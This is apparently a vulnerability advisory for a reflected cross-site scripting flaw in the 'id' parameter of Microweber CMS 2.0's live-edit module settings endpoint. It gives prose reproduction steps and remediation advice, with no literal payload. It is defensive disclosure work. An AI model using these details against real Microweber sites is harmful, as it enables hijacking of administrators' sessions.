Microweber CMS Reflected Cross-Site Scripting Vulnerability in Live Edit API

A reflected cross-site scripting vulnerability has been identified in Microweber CMS version 2.0. The issue resides in the 'id' parameter of the 'live_edit.module_settings' API endpoint. The vulnerability allows the execution of arbitrary JavaScript by injecting crafted payloads into the URL. When accessed by an authenticated admin user, the injected script executes in their context, potentially leading to cookie theft or other malicious actions.

Impact

Exploitation of this vulnerability allows for reflected cross-site scripting, where an attacker can execute arbitrary JavaScript in the context of the affected user.

Reproduction

To reproduce this vulnerability, log in as an admin user and navigate to the 'live_edit.module_settings' API endpoint. Inject a script payload into the 'id' parameter, such as a script tag containing JavaScript code, and observe that the script executes, confirming the cross-site scripting vulnerability.

Remediation

It is recommended to sanitize the 'id' parameter using Laravel's input validation, escape data with Laravel's 'e()' function before rendering, implement strict allowlisting of values for dynamic rendering, and apply Content Security Policy headers to mitigate XSS impact.